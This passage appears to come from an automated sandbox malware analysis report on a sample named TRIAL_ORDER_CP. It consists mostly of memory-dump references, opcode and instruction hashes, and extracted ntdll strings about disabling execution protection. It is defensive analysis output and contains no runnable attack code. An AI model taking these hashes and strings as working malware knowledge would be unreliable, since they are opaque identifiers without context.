                                          • Opcode Fuzzy Hash: da03aab52e060893498e81c1b44f2f51bb9adca435a4be77bbe4082c2272f9a9
                                          • Instruction Fuzzy Hash: D090023120504C42D58071584514A46001547D030EF51D426A0058654EE6358D59B662
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2781b4bfffd68b7e35bf4ac01438963bc0831edfe7b555c03abef40e561c89eb
                                          • Instruction ID: 49aa3dd502a8a3c21162a4b5d85c4d333a8b3dbd09010d217df81847c47f1bb8
                                          • Opcode Fuzzy Hash: 2781b4bfffd68b7e35bf4ac01438963bc0831edfe7b555c03abef40e561c89eb
                                          • Instruction Fuzzy Hash: 2790023120100C02D54461584914686000547D030AF51D426A6018615FE67588957132
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: eafd1828675e437a039a28a70607895ba722cd4e92a87ac8a0ae8d28423916cf
                                          • Instruction ID: 916a361105e55ddad0b6e06ae89639e9cbd61d20327b95bbcc2e470d3b88158c
                                          • Opcode Fuzzy Hash: eafd1828675e437a039a28a70607895ba722cd4e92a87ac8a0ae8d28423916cf
                                          • Instruction Fuzzy Hash: 0090023160500C02D59071584524746000547D030AF51D426A0018614ED7658A5976A2
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ac2178f7284edfa70e1de41777c9663d68f68055ac4af581cc21b94f6059e07d
                                          • Instruction ID: b259f5cfe32e39263e2896ddb952f70fbe15a953b6cb59cad488c1ab6f0066da
                                          • Opcode Fuzzy Hash: ac2178f7284edfa70e1de41777c9663d68f68055ac4af581cc21b94f6059e07d
                                          • Instruction Fuzzy Hash: 54900225221004020585A558071450B044557D635A391D42AF140A550DD63188696322
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 36f3dea66152c6b15cb18cdb28ca5fbe22d8a8355d58fd0ff5b358e58fee3811
                                          • Instruction ID: e20e3982bfe399c5e56b16d31c07ff07ac690d0c8678216763118d0f51f0a63d
                                          • Opcode Fuzzy Hash: 36f3dea66152c6b15cb18cdb28ca5fbe22d8a8355d58fd0ff5b358e58fee3811
                                          • Instruction Fuzzy Hash: 9B900435311004030545F55C0714507004747D535F351D437F100D510DF731CC757133
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bd3d1f4468fd05ca2e8ee07e76e45d1fbbbb1784821d18aace6d4e6dabf302c8
                                          • Instruction ID: 61b2444d35dc64a091d82cfc22fb871af8737cecd5336d46f780a5fda52af237
                                          • Opcode Fuzzy Hash: bd3d1f4468fd05ca2e8ee07e76e45d1fbbbb1784821d18aace6d4e6dabf302c8
                                          • Instruction Fuzzy Hash: 849002A1201144924940A2588514B0A450547E020AB51D42BE1048520DD5358855A136
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 717f83d116226e45cd698d7142b0be7db8f00074e5839759560bbf7d4bbb4f09
                                          • Instruction ID: 44faa214f07f169cf28e218bed6d3260f7ee06fbee97983a225c7a4575a92204
                                          • Opcode Fuzzy Hash: 717f83d116226e45cd698d7142b0be7db8f00074e5839759560bbf7d4bbb4f09
                                          • Instruction Fuzzy Hash: 2B90022124505502D590715C4514616400567E020AF51D436A0808554ED56588597222
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f7d39a9114cb9cd1fee791670349ebcc85fc20cb83c1500cf3097afeb682554b
                                          • Instruction ID: 4284840dd37d494fc4e5ec7a649a48ed7f44633babd45ee1436b17a3a4bfdcf5
                                          • Opcode Fuzzy Hash: f7d39a9114cb9cd1fee791670349ebcc85fc20cb83c1500cf3097afeb682554b
                                          • Instruction Fuzzy Hash: 2090022124100C02D58071588524707000687D060AF51D426A0018514ED626896976B2
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5360122a889f17a2cfd13f040051ef48524e749be5f6ae7f4e579e035c6bb940
                                          • Instruction ID: d0a455c9707c88391ddc372dd7737d9d2c1a376852d48c730872ae77b3a7435a
                                          • Opcode Fuzzy Hash: 5360122a889f17a2cfd13f040051ef48524e749be5f6ae7f4e579e035c6bb940
                                          • Instruction Fuzzy Hash: D590022120144842D58062584914B0F410547E120BF91D42EA414A514DD92588596722
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f9425534455bad54eec1ea25bcefe0192ddd521ac853e10474a4a6bf21456e62
                                          • Instruction ID: b4cd6d9f6afbae6e08a716cb0c9548d497b57536e7648cbe960ee3108bfa2b1a
                                          • Opcode Fuzzy Hash: f9425534455bad54eec1ea25bcefe0192ddd521ac853e10474a4a6bf21456e62
                                          • Instruction Fuzzy Hash: A890022121180442D64065684D24B07000547D030BF51D52AA0148514DD92588656522
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1c23412dfada4a828fbaadb9b7ec4034802be13d3f4b61d97f224a51b54b57d2
                                          • Instruction ID: 581a2dd5f9c38aae8a4a5bdad5b31e5439e80b1f6229d65215b04f3428cc9b43
                                          • Opcode Fuzzy Hash: 1c23412dfada4a828fbaadb9b7ec4034802be13d3f4b61d97f224a51b54b57d2
                                          • Instruction Fuzzy Hash: E490026121100442D54461584514706004547E120AF51D427A2148514DD5398C656126
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a117acba1d082946782038acbd39a339987bbb400ba9e17b5febed2b2f8d51a9
                                          • Instruction ID: d1901dcdc55ab9468616e10b97765325232baee7a54aee1feafe6f10f321aa66
                                          • Opcode Fuzzy Hash: a117acba1d082946782038acbd39a339987bbb400ba9e17b5febed2b2f8d51a9
                                          • Instruction Fuzzy Hash: 0E9002216010044245807168895490640056BE121A751D536A098C510ED56988696666
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1ec8b254312aff3c77f887a735eae9eb2312e9805660c0fcc6f6e2bf01f55914
                                          • Instruction ID: 795c34bae302cbc90594b4835cc5f3467e3177dcf3b9da8e8a4f5d83331aa38a
                                          • Opcode Fuzzy Hash: 1ec8b254312aff3c77f887a735eae9eb2312e9805660c0fcc6f6e2bf01f55914
                                          • Instruction Fuzzy Hash: 2E90023120140802D54061584918747000547D030BF51D426A5158515FD675C8957532
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5dac99c08198e81764a23afff7ee79218bb3e927a2ba7f2aa4c97b27e9b36b4b
                                          • Instruction ID: 65b5232729d9bae205eae6b7fec967c06b57a2d14232dab70d12ce7342637319
                                          • Opcode Fuzzy Hash: 5dac99c08198e81764a23afff7ee79218bb3e927a2ba7f2aa4c97b27e9b36b4b
                                          • Instruction Fuzzy Hash: A790026120140803D58065584914607000547D030BF51D426A2058515FDA398C557136
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4f1752fffb4011b8fa76e62516fcf0ba8ce5ed1d94b009843238057245d894ae
                                          • Instruction ID: 47ca77cf0967bd3ffd0ca1eef71a7268a46400b5d712cbd1808e61aa99da9204
                                          • Opcode Fuzzy Hash: 4f1752fffb4011b8fa76e62516fcf0ba8ce5ed1d94b009843238057245d894ae
                                          • Instruction Fuzzy Hash: 8B90026134100842D54061584524B06000587E130AF51D42AE1058514ED629CC567127
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d47c5703427f2a82bbab700ecbf0991e24efbf8fb73610693d0f958b8637534c
                                          • Instruction ID: 1c7c0ada21e0ec9220db6126f2ea7753f2317a1e81a786af78b31d28d990eac5
                                          • Opcode Fuzzy Hash: d47c5703427f2a82bbab700ecbf0991e24efbf8fb73610693d0f958b8637534c
                                          • Instruction Fuzzy Hash: 1490022160100902D54171584514616000A47D024AF91D437A1018515FDA358996B132
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bbb012a5ef3730bae345d19f064d137f782544dcb3ec0adf5408ac30965302eb
                                          • Instruction ID: 2352c6d913812636e1e2b51f85e3793ff9f58693d06a2078784280ed92d45fa7
                                          • Opcode Fuzzy Hash: bbb012a5ef3730bae345d19f064d137f782544dcb3ec0adf5408ac30965302eb
                                          • Instruction Fuzzy Hash: 0C90027120100802D58071584514746000547D030AF51D426A5058514FD6698DD97666
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 22b46c2b5d22b7184e3bb25832af32cff1ee8222c8958cd9539697c280874149
                                          • Instruction ID: db65f265a62aed9bd1baee286624f75b8d3dc63229ca2047ae216b3ad16f7989
                                          • Opcode Fuzzy Hash: 22b46c2b5d22b7184e3bb25832af32cff1ee8222c8958cd9539697c280874149
                                          • Instruction Fuzzy Hash: 2390022130100802D54261584524606000987D134EF91D427E1418515ED6358957B133
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: eaf129cff81e41c628c38353c2ac9b3d84ab459b6e9bd30aca6292a140dcb27f
                                          • Instruction ID: cb72d6b092b5c22a77a27dd3fb10721a61af4479660cd3fb96ff8fb34fc1d60e
                                          • Opcode Fuzzy Hash: eaf129cff81e41c628c38353c2ac9b3d84ab459b6e9bd30aca6292a140dcb27f
                                          • Instruction Fuzzy Hash: B790023520100802D95061585914646004647D030AF51E826A0418518ED66488A5B122
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 55dccfdec7a43dcc814e7c2b9537602d3f6e72ce24234b9e90f5b36d83ac2c81
                                          • Instruction ID: df55c5c5ba02ba136f3308a02574072b2c569b9abb4798bdabb917b40bef8678
                                          • Opcode Fuzzy Hash: 55dccfdec7a43dcc814e7c2b9537602d3f6e72ce24234b9e90f5b36d83ac2c81
                                          • Instruction Fuzzy Hash: 51900221242045525985B1584514507400657E024A791D427A1408910DD536985AE622
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ce310ba181a400916d868847bf4d854f29664dfd025212c4b9aeecf900c96082
                                          • Instruction ID: 9414fd288c7bb31f88ff9143789571c3d8250439c82ca59ec65fd0b5d94132c4
                                          • Opcode Fuzzy Hash: ce310ba181a400916d868847bf4d854f29664dfd025212c4b9aeecf900c96082
                                          • Instruction Fuzzy Hash: 1C90023124100802D58171584514606000957D024AF91D427A0418514FD6658A5ABA62
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 82dd0b80e9ae3658f42b6c2e6d44bb6addf9cbf260b0e0e7d2ff7c79c47a041e
                                          • Instruction ID: e34c2347e939df40d1cca1f27432c82537dae30541ce09a58b75101f5e7a6f61
                                          • Opcode Fuzzy Hash: 82dd0b80e9ae3658f42b6c2e6d44bb6addf9cbf260b0e0e7d2ff7c79c47a041e
                                          • Instruction Fuzzy Hash: 7690022921300402D5C07158551860A000547D120BF91E82AA0009518DD925886D6322
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: da10c9103bf2a82946dd5c14039b024f49e32eb893ead1158f40dffcceefe4f8
                                          • Instruction ID: 3e32f6146fc81be059f5901fa76b9441ceba08d8bbf7b711fb892a1cfbc25db2
                                          • Opcode Fuzzy Hash: da10c9103bf2a82946dd5c14039b024f49e32eb893ead1158f40dffcceefe4f8
                                          • Instruction Fuzzy Hash: CD90023120200542998062585914A4E410547E130BB91E82AA0009514DD92488656222
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a5313113e3079fe7169c0837acc9a0d1e4a36c6e4ac97a56d056b79c20a053cf
                                          • Instruction ID: 8a2c7dd7735757958d65cefd655dd2ea69dab940024171d98f75eb511d3af707
                                          • Opcode Fuzzy Hash: a5313113e3079fe7169c0837acc9a0d1e4a36c6e4ac97a56d056b79c20a053cf
                                          • Instruction Fuzzy Hash: E690022120504842D54065585518A06000547D020EF51E426A1058555ED6358855B132
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2cdc925a68bee0d7a266b73d58c84070894f58ebd57581a7bb73dfd506de704b
                                          • Instruction ID: 05fa6c225d1f79a33bda6a922744e36af80b220cc7de4c366bec23b3def701d4
                                          • Opcode Fuzzy Hash: 2cdc925a68bee0d7a266b73d58c84070894f58ebd57581a7bb73dfd506de704b
                                          • Instruction Fuzzy Hash: E190023120100803D54061585618707000547D020AF51E826A0418518EE66688557122
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ec7d1aec7d8f2cb42eda1e08b9004da349ddca861a89792c85020e5f82ec863d
                                          • Instruction ID: 89a8a263d1a15f41772b3ea71a4a80d70b3d4144e7171797f104037b4170f5a2
                                          • Opcode Fuzzy Hash: ec7d1aec7d8f2cb42eda1e08b9004da349ddca861a89792c85020e5f82ec863d
                                          • Instruction Fuzzy Hash: 7690022130100403D58071585528606400597E130AF51E426E0408514DE925885A6223
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                          • Instruction ID: ba48e9399c9e1b066e622d16a0e0f030037c991fca9bbb17fb3ae0c9f671d9e2
                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                          • Instruction Fuzzy Hash:

                                          Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972047929.0000000033800000.00000040.00001000.00020000.00000000.sdmp, Offset: 33800000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33800000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                          • API String ID: 0-3558027158
                                          • Opcode ID: f4c71918ec4edc708617026b187216b3c1cc791baa12620b10c3a4e58e123a42
                                          • Instruction ID: 9f2c33d135075ca72c73a195e92f2a193b45c7d605a902778620141270f85ab1
                                          • Opcode Fuzzy Hash: f4c71918ec4edc708617026b187216b3c1cc791baa12620b10c3a4e58e123a42
                                          • Instruction Fuzzy Hash: 87914DF04482988AC7158F55A0612AFFFB1EBC6305F15816DE7E6BB243C3BE89458F85

                                          Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
                                          • Associated: 00000003.00000002.270972182886.0000000033C09000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 00000003.00000002.270972182886.0000000033C0D000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_33ae0000_TRIAL_ORDER_CP.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: HEAP:
                                          • API String ID: 3446177414-2466845122
                                          • Opcode ID: e7cab79f66eb01bfd5a118d258371c8f3a00c811981132086eae35ae2aa512ca
                                          • Instruction ID: 3462d8143e4541115b09b4a2d97503c976361f1b546a3c763762a003943b9213
                                          • Opcode Fuzzy Hash: e7cab79f66eb01bfd5a118d258371c8f3a00c811981132086eae35ae2aa512ca
                                          • Instruction Fuzzy Hash: 24A17776A04321CFD704CE28D894A1ABBE9FF88354F194579E985EB320EB70ED45CB91
                                          Strings
                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 33B84507
                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 33B84592
                                          • Execute=1, xrefs: 33B8451E
                                          • ExecuteOptions, xrefs: 33B844AB
                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 33B84530
                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 33B84460
                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 33B8454D
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.270972182886.0000000033AE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33AE0000, based on PE: true
